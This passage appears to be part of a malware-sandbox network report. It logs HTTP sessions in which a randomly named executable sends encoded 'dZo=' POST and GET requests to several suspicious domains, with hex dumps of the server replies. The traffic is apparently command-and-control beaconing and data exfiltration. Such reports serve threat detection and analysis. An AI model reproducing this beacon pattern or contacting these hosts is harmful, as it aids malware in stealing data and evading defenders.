                                                      Aug 18, 2024 18:26:55.739684105 CEST559INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      36192.168.2.95414635.241.42.217801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:26:57.592564106 CEST438OUTGET /zjwj/?dZo=nHLCZn8vN2ArVDTu2n5oID6vRNbj9hrWV4l8hQoFqQuK0GTLFPexr5xj3EirNaSr0bv3za4OohaILLkKIoyZXyXWPQEhmyBEuX+CqEarOAabuvO7hw==&gta=rzqXf4A02FEl_8 HTTP/1.1
                                                      Host: www.tqfabxah.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US,en
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Aug 18, 2024 18:26:58.234942913 CEST300INHTTP/1.1 200 OK
                                                      Server: nginx/1.20.2
                                                      Date: Sun, 18 Aug 2024 16:26:58 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 5161
                                                      Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT
                                                      Vary: Accept-Encoding
                                                      ETag: "65a4939c-1429"
                                                      Cache-Control: no-cache
                                                      Accept-Ranges: bytes
                                                      Via: 1.1 google
                                                      Connection: close
                                                      Aug 18, 2024 18:26:58.248225927 CEST1236INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63
                                                      Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
                                                      Aug 18, 2024 18:26:58.248235941 CEST1236INData Raw: 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 6e 7d 66 75 6e 63 74 69 6f 6e 20 72 65 70 6f 72 74 4c 6f 61 64 69 6e 67 28 6e 29 7b 6e 3d 6e 7c 7c 7b 7d 3b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 28 77 69 6e 64 6f
                                                      Data Ascii: w Image).src=n}function reportLoading(n){n=n||{};var o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.
                                                      Aug 18, 2024 18:26:58.248260975 CEST1236INData Raw: 74 72 3d 64 73 66 72 70 66 76 65 64 6e 63 70 73 73 6e 74 6e 77 62 69 70 72 65 69 6d 65 75 74 73 76 22 29 3b 28 65 28 29 7c 7c 72 28 29 29 26 26 22 61 6e 64 72 6f 69 64 22 3d 3d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f
                                                      Data Ascii: tr=dsfrpfvedncpssntnwbipreimeutsv");(e()||r())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/ap
                                                      Aug 18, 2024 18:26:58.248270035 CEST1236INData Raw: 28 22 73 72 63 22 2c 22 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 30 31 2f 77 65 6c 66 61 72 65 61 67 65 6e 63 79 2f 76 63 6f 6e 73 6f 6c 65 2e 6d 69 6e 2d 33 2e 33 2e 30 2e 6a 73 22 29 2c 24 68 65 61 64 2e 69 6e 73 65 72
                                                      Data Ascii: ("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src
                                                      Aug 18, 2024 18:26:58.248286009 CEST217INData Raw: e6 b2 a1 e6 9c 89 e5 b9 bf e5 91 8a 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 94 b5 e5 bd b1 e6 92 ad e6 94 be e4 b8 8d e5 8d a1 e9 a1 bf 3c 2f 64 69 76 3e 3c 64 69 76 3e e7 b2 be e5 bd a9 e8 a7 86 e9 a2 91 e5 ad 98 e5 85 a5 e7 bd 91 e7 9b 98 e9 9a 8f
                                                      Data Ascii: </div><div></div><div></div></div><script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      37192.168.2.95414776.223.67.189801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:27:03.377296925 CEST710OUTPOST /l2ei/ HTTP/1.1
                                                      Host: www.rtrpodcast.online
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.rtrpodcast.online
                                                      Referer: http://www.rtrpodcast.online/l2ei/
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 37 50 5a 4a 52 53 58 78 62 57 53 6c 71 6c 4f 4a 31 64 44 33 35 49 42 78 63 4d 4b 7a 30 4c 75 68 42 46 67 4e 63 43 6c 47 62 56 4d 7a 64 6e 71 6f 43 39 77 78 66 53 77 47 2b 6b 72 53 4f 7a 38 62 4e 57 58 34 55 53 65 45 42 65 6d 6b 4c 77 5a 37 50 68 4d 5a 34 5a 55 50 49 57 6f 50 4c 46 35 78 73 74 51 34 7a 6b 34 59 39 39 68 6e 4d 52 73 43 4b 2b 74 54 6c 43 44 58 6e 4d 42 59 2f 77 4a 45 73 47 79 71 46 64 77 47 6b 36 38 79 5a 73 49 50 39 31 7a 5a 49 4a 43 69 6c 65 68 6b 4e 6b 4d 57 67 4e 69 58 43 44 52 71 42 79 55 34 67 6d 32 4b 4c 63 59 67 32 4e 4f 62 66 7a 36 77
                                                      Data Ascii: dZo=7PZJRSXxbWSlqlOJ1dD35IBxcMKz0LuhBFgNcClGbVMzdnqoC9wxfSwG+krSOz8bNWX4USeEBemkLwZ7PhMZ4ZUPIWoPLF5xstQ4zk4Y99hnMRsCK+tTlCDXnMBY/wJEsGyqFdwGk68yZsIP91zZIJCilehkNkMWgNiXCDRqByU4gm2KLcYg2NObfz6w


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      38192.168.2.95414876.223.67.189801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:27:05.989432096 CEST734OUTPOST /l2ei/ HTTP/1.1
                                                      Host: www.rtrpodcast.online
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.rtrpodcast.online
                                                      Referer: http://www.rtrpodcast.online/l2ei/
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 37 50 5a 4a 52 53 58 78 62 57 53 6c 72 46 65 4a 32 2b 72 33 38 6f 42 2b 5a 4d 4b 7a 37 72 76 4a 42 46 38 4e 63 41 4a 76 59 6e 6f 7a 64 47 61 6f 42 38 77 78 59 53 77 47 6d 30 72 54 42 54 39 5a 4e 57 4c 77 55 54 69 45 42 66 43 6b 4c 31 64 37 49 53 6b 65 34 4a 55 4e 44 32 6f 42 47 6c 35 78 73 74 51 34 7a 6b 38 6d 39 39 70 6e 4d 67 38 43 4c 62 5a 55 35 53 44 51 67 4d 42 59 37 77 4a 49 73 47 79 45 46 59 6f 34 6b 35 49 79 5a 74 34 50 39 42 6e 61 43 4a 44 6e 36 75 67 42 65 6b 56 6e 75 66 66 4e 4a 46 52 7a 44 68 49 42 6a 48 57 55 61 75 52 37 6a 61 4f 38 59 55 7a 59 2f 49 77 62 77 38 43 49 67 4a 66 73 59 47 45 54 78 50 45 39 72 41 3d 3d
                                                      Data Ascii: dZo=7PZJRSXxbWSlrFeJ2+r38oB+ZMKz7rvJBF8NcAJvYnozdGaoB8wxYSwGm0rTBT9ZNWLwUTiEBfCkL1d7ISke4JUND2oBGl5xstQ4zk8m99pnMg8CLbZU5SDQgMBY7wJIsGyEFYo4k5IyZt4P9BnaCJDn6ugBekVnuffNJFRzDhIBjHWUauR7jaO8YUzY/Iwbw8CIgJfsYGETxPE9rA==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      39192.168.2.95414976.223.67.189801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:27:08.529903889 CEST1747OUTPOST /l2ei/ HTTP/1.1
                                                      Host: www.rtrpodcast.online
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.rtrpodcast.online
                                                      Referer: http://www.rtrpodcast.online/l2ei/
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 37 50 5a 4a 52 53 58 78 62 57 53 6c 72 46 65 4a 32 2b 72 33 38 6f 42 2b 5a 4d 4b 7a 37 72 76 4a 42 46 38 4e 63 41 4a 76 59 6e 67 7a 64 77 4f 6f 44 66 49 78 5a 53 77 47 34 6b 72 65 42 54 39 59 4e 57 54 30 55 54 75 55 42 63 71 6b 61 6a 68 37 4e 6a 6b 65 33 4a 55 4e 4d 57 6f 41 4c 46 34 31 73 74 67 38 7a 6c 4d 6d 39 39 70 6e 4d 69 55 43 4d 4f 74 55 37 53 44 58 6e 4d 42 55 2f 77 4a 73 73 43 6d 79 46 59 6b 6f 6b 4b 51 79 5a 4f 41 50 75 69 50 61 66 35 44 70 37 75 67 6a 65 6b 70 38 75 66 43 38 4a 46 4e 4a 44 68 77 42 6a 44 66 4d 66 50 6c 6a 39 71 4f 57 59 55 69 2b 38 50 77 37 78 4e 76 72 6e 63 2f 38 4f 44 78 6d 77 4c 56 52 6f 33 36 63 68 70 36 31 5a 69 69 42 43 50 53 69 6e 34 6f 33 37 65 54 4a 65 2b 63 6e 7a 54 4d 63 4c 32 4e 52 72 49 6e 55 71 2f 62 73 4a 78 4b 61 61 33 30 61 58 75 2f 43 33 30 34 52 46 66 36 30 50 44 33 35 7a 66 4f 49 7a 69 6b 73 69 55 42 66 67 79 53 5a 30 62 48 30 53 32 55 46 73 43 7a 44 46 30 6a 64 71 77 49 68 55 39 36 56 42 79 79 52 54 53 75 72 54 36 79 67 2f 53 35 6d 50 62 [TRUNCATED]
                                                      Data Ascii: dZo=7PZJRSXxbWSlrFeJ2+r38oB+ZMKz7rvJBF8NcAJvYngzdwOoDfIxZSwG4kreBT9YNWT0UTuUBcqkajh7Njke3JUNMWoALF41stg8zlMm99pnMiUCMOtU7SDXnMBU/wJssCmyFYkokKQyZOAPuiPaf5Dp7ugjekp8ufC8JFNJDhwBjDfMfPlj9qOWYUi+8Pw7xNvrnc/8ODxmwLVRo36chp61ZiiBCPSin4o37eTJe+cnzTMcL2NRrInUq/bsJxKaa30aXu/C304RFf60PD35zfOIziksiUBfgySZ0bH0S2UFsCzDF0jdqwIhU96VByyRTSurT6yg/S5mPbcyV5hMV1f7TZ5vXI2tpgD1nEFOKWt1zN+CjkcrrSyD0kuQWTutsZLGCdLgVX/+mVlv0BJcYUVrgZpS0IDsVzfBZ87nqb14QjthtcXgw8ttvr9TzbGG0dOlLd5McJLvGSWiXfzZJVJZwELBcBeeaQprkb9ufaTGgPmz9w1D7yEpIOzFm+TRIjomyODDuRpnWLahwJ+U/yCXiczTPiwtTK7cr5r8YjdPwmSrS2oh0C3JNdpxMQOuZ9/ixcyyoSvCjfV0NfkSaXvF9jqyBnKtGyTdtlcd7skSCIT2FjKQ83fAnVHc3/wxWmqAPAYXgLeobV6aXqaAbPbNpSX/9NWSygo+qA5uMjp27a/IhRIhnHLTVfrJH6WioLAH/+U7My5GLp65SQGK8lF7aMgfNC8jOoGPcrJyKb162puCh9FI+EduOUtOD7MT4psy0TbK9MkIaj5Mx7NNZ69eK0n/uEKZm1P2DBH1iU0FqBTEXuEN9QGJ5R7YqXOi7b5y+lXOGEIGzHTzOruSQLcoRDHfLjnxUCHcwQnHKe5qJW56THMRNkliivz83eAnug2ovZZnDMEHJGCeB6jvyeanqczsmL97S2DmBa2cbdY+Q9cD1yJlQWPUzLfB9vlZ9SwwC38a37bfL1aRpkLAEYOgbtzFQc/V2lOx4ruWpkBFhqrt [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      40192.168.2.95415076.223.67.189801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:27:11.067992926 CEST443OUTGET /l2ei/?dZo=2NxpSnefRSOpgA+Cw+nYyIA+NZzll6fiLmMZXjpfeHguawaVYOMhehQzwyXJSn5dNV3paxCkLfqDWT9yLxINn5BMEGgIAwhvnt05vUIz6811FQIGXw==&gta=rzqXf4A02FEl_8 HTTP/1.1
                                                      Host: www.rtrpodcast.online
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US,en
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Aug 18, 2024 18:27:11.524272919 CEST394INHTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Sun, 18 Aug 2024 16:27:11 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 254
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 64 5a 6f 3d 32 4e 78 70 53 6e 65 66 52 53 4f 70 67 41 2b 43 77 2b 6e 59 79 49 41 2b 4e 5a 7a 6c 6c 36 66 69 4c 6d 4d 5a 58 6a 70 66 65 48 67 75 61 77 61 56 59 4f 4d 68 65 68 51 7a 77 79 58 4a 53 6e 35 64 4e 56 33 70 61 78 43 6b 4c 66 71 44 57 54 39 79 4c 78 49 4e 6e 35 42 4d 45 47 67 49 41 77 68 76 6e 74 30 35 76 55 49 7a 36 38 31 31 46 51 49 47 58 77 3d 3d 26 67 74 61 3d 72 7a 71 58 66 34 41 30 32 46 45 6c 5f 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?dZo=2NxpSnefRSOpgA+Cw+nYyIA+NZzll6fiLmMZXjpfeHguawaVYOMhehQzwyXJSn5dNV3paxCkLfqDWT9yLxINn5BMEGgIAwhvnt05vUIz6811FQIGXw==&gta=rzqXf4A02FEl_8"}</script></head></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      41192.168.2.954151116.213.43.190801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:27:25.135858059 CEST692OUTPOST /jda9/ HTTP/1.1
                                                      Host: www.mqmsqkw.lol
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.mqmsqkw.lol
                                                      Referer: http://www.mqmsqkw.lol/jda9/
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 36 36 45 48 54 39 37 7a 59 71 75 35 66 30 49 57 68 37 31 43 51 39 56 65 38 45 6a 61 49 62 66 72 6f 50 50 38 41 4e 58 4e 73 77 38 72 33 36 6d 38 69 41 73 6c 63 30 74 62 59 54 66 50 61 41 34 76 2f 52 2f 4a 54 56 72 46 4c 76 59 75 35 49 32 63 32 65 31 4a 63 2b 48 62 75 48 77 41 49 67 6a 2b 36 64 7a 6b 55 6f 76 70 61 48 75 4f 69 66 37 67 78 32 78 59 6e 6b 37 71 4e 45 72 39 39 46 4a 42 70 52 58 34 54 39 6a 73 55 2f 58 58 50 50 56 6b 33 76 47 50 71 73 62 50 57 4c 44 70 38 6a 63 48 5a 38 70 53 4b 68 6a 7a 76 53 50 36 54 6e 48 59 51 63 61 4a 30 68 55 4e 51 52 5a 65
                                                      Data Ascii: dZo=66EHT97zYqu5f0IWh71CQ9Ve8EjaIbfroPP8ANXNsw8r36m8iAslc0tbYTfPaA4v/R/JTVrFLvYu5I2c2e1Jc+HbuHwAIgj+6dzkUovpaHuOif7gx2xYnk7qNEr99FJBpRX4T9jsU/XXPPVk3vGPqsbPWLDp8jcHZ8pSKhjzvSP6TnHYQcaJ0hUNQRZe


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      42192.168.2.954152116.213.43.190801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:27:27.675473928 CEST716OUTPOST /jda9/ HTTP/1.1
                                                      Host: www.mqmsqkw.lol
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.mqmsqkw.lol
                                                      Referer: http://www.mqmsqkw.lol/jda9/
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 36 36 45 48 54 39 37 7a 59 71 75 35 65 56 34 57 6a 63 4a 43 56 64 56 64 7a 6b 6a 61 47 4c 66 56 6f 4f 7a 38 41 4a 48 64 74 43 6f 72 33 59 2b 38 6a 43 55 6c 52 55 74 62 66 6a 66 4b 55 67 34 61 2f 52 37 76 54 51 44 46 4c 76 4d 75 35 4a 47 63 32 74 64 47 64 75 48 56 31 33 77 65 47 41 6a 2b 36 64 7a 6b 55 6f 71 2b 61 48 32 4f 69 76 72 67 79 58 78 62 75 45 36 59 45 6b 72 39 35 46 4a 46 70 52 57 76 54 38 2b 35 55 39 66 58 50 4f 46 6b 33 2b 47 49 67 73 62 42 59 72 43 6a 37 51 39 43 42 37 31 39 56 43 2f 49 75 68 66 42 55 47 6e 47 42 75 54 53 68 32 55 71 58 32 51 32 6c 45 42 52 54 6b 68 31 79 43 45 2b 6e 4c 74 76 6c 6e 54 6b 4a 77 3d 3d
                                                      Data Ascii: dZo=66EHT97zYqu5eV4WjcJCVdVdzkjaGLfVoOz8AJHdtCor3Y+8jCUlRUtbfjfKUg4a/R7vTQDFLvMu5JGc2tdGduHV13weGAj+6dzkUoq+aH2OivrgyXxbuE6YEkr95FJFpRWvT8+5U9fXPOFk3+GIgsbBYrCj7Q9CB719VC/IuhfBUGnGBuTSh2UqX2Q2lEBRTkh1yCE+nLtvlnTkJw==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      43192.168.2.954153116.213.43.190801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:27:30.222593069 CEST1729OUTPOST /jda9/ HTTP/1.1
                                                      Host: www.mqmsqkw.lol
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.mqmsqkw.lol
                                                      Referer: http://www.mqmsqkw.lol/jda9/
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 36 36 45 48 54 39 37 7a 59 71 75 35 65 56 34 57 6a 63 4a 43 56 64 56 64 7a 6b 6a 61 47 4c 66 56 6f 4f 7a 38 41 4a 48 64 74 43 77 72 33 4c 32 38 68 6c 34 6c 51 55 74 62 63 6a 66 4c 55 67 34 48 2f 52 44 6a 54 51 47 77 4c 74 30 75 37 76 79 63 2f 38 64 47 54 75 48 56 71 48 77 66 49 67 6a 52 36 64 6a 67 55 6f 36 2b 61 48 32 4f 69 74 6a 67 6b 32 78 62 69 6b 37 71 4e 45 72 68 39 46 4a 39 70 56 43 2f 54 38 36 70 56 4e 2f 58 42 50 31 6b 37 73 2b 49 6f 73 61 6e 62 72 44 32 37 51 78 4a 42 2f 56 41 56 42 6a 69 75 68 58 42 58 68 47 6c 57 4b 50 77 67 6c 56 61 64 30 6b 74 74 77 42 70 52 30 46 30 75 7a 56 65 38 61 4a 35 76 53 37 74 57 4e 49 44 56 68 64 36 75 73 55 33 6f 6e 65 30 38 76 4b 45 36 6f 68 37 65 39 69 59 4b 50 75 2b 43 36 35 6d 56 75 6a 57 4f 47 38 59 34 54 73 67 72 4e 70 4b 68 45 66 54 57 4c 4a 42 6e 64 57 6e 36 76 44 38 68 36 54 71 2f 39 41 48 36 61 79 7a 79 37 65 7a 77 41 64 6e 77 4d 79 41 45 77 4e 67 63 4e 48 71 52 51 68 2b 50 37 69 79 38 62 4f 43 77 35 58 34 55 39 6b 4f 52 6b 39 79 48 6f [TRUNCATED]
                                                      Data Ascii: dZo=66EHT97zYqu5eV4WjcJCVdVdzkjaGLfVoOz8AJHdtCwr3L28hl4lQUtbcjfLUg4H/RDjTQGwLt0u7vyc/8dGTuHVqHwfIgjR6djgUo6+aH2Oitjgk2xbik7qNErh9FJ9pVC/T86pVN/XBP1k7s+IosanbrD27QxJB/VAVBjiuhXBXhGlWKPwglVad0kttwBpR0F0uzVe8aJ5vS7tWNIDVhd6usU3one08vKE6oh7e9iYKPu+C65mVujWOG8Y4TsgrNpKhEfTWLJBndWn6vD8h6Tq/9AH6ayzy7ezwAdnwMyAEwNgcNHqRQh+P7iy8bOCw5X4U9kORk9yHok3pXadEYti0irnc24LNW9dR1oN8KtX2vYvta6fO0SBRc2OIZ3S/yDeiS6DwWGc3RBq1Ap2zy5L5bCU0gYejr+6XMB0Mv2dL0uiyPJ6FjdMpVKGvwbuVEuVWw3HV6/JUyYjGvWEMqNHm+a6lReotS2l5uzrmRxTBMI3d5DErQr2Ojg/nix5/lU8ioGSbg8G6PpF6do+xteYwBXuXqsGvS20mH4CdrxbA1k86ge8jsnMBAm0EZPHyl/uZ/74or5pTBNIJ9bZ0ZQdZHVCUg/y+MJYmOmN3xRukbw/b+uozNaGd00SWe96CszZLRFr9cGMJOT2xFqDgcLW00zyOqdAhNUYshReD6wtBmeXTAw1RNzZmu+o5Z04YrHsWj9JVYQEzEQZuTKin38WAIH3/377jG6b2LaWIazeH3IfJw+DSt2tb/y4XDd6ylcyVEwIjIUZ4FGWZL/1ZEM9FGnJFTtdYBIi5ipSWHyKQQlj3z3cGKUu4ffu4Up4MnbQkxC2hqrEynMw5bMOhtC3pFtsZSuitijrNKsLWHXv4m4ltI9eGCwIIDUkJV9H+5mZ6gPIJLZ+qPghQjhqTYjP39KY2T3fcqjZ8YF2m2bhFyH+aGmNKjPBXEx5wgtH2q5GEElcsQdeLN1lNdirVlRPPFi83p5giejqkhIxivX1MiXk [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      44192.168.2.954154116.213.43.190801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:27:32.762904882 CEST437OUTGET /jda9/?dZo=34snQIO0a+qzYlkumKI+eaAwv3nNcrL7qOToIJHZshoLhvuGziw8TW5Od2ToMUc/iXvMW07TMOYG4pWJ/ehZNMDgqEYgAwPZ0d7uU4aGTG2kjdzpwg==&gta=rzqXf4A02FEl_8 HTTP/1.1
                                                      Host: www.mqmsqkw.lol
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US,en
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      45192.168.2.954155116.213.43.190801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:27:59.680413008 CEST692OUTPOST /yxos/ HTTP/1.1
                                                      Host: www.lfghtko.lol
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.lfghtko.lol
                                                      Referer: http://www.lfghtko.lol/yxos/
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
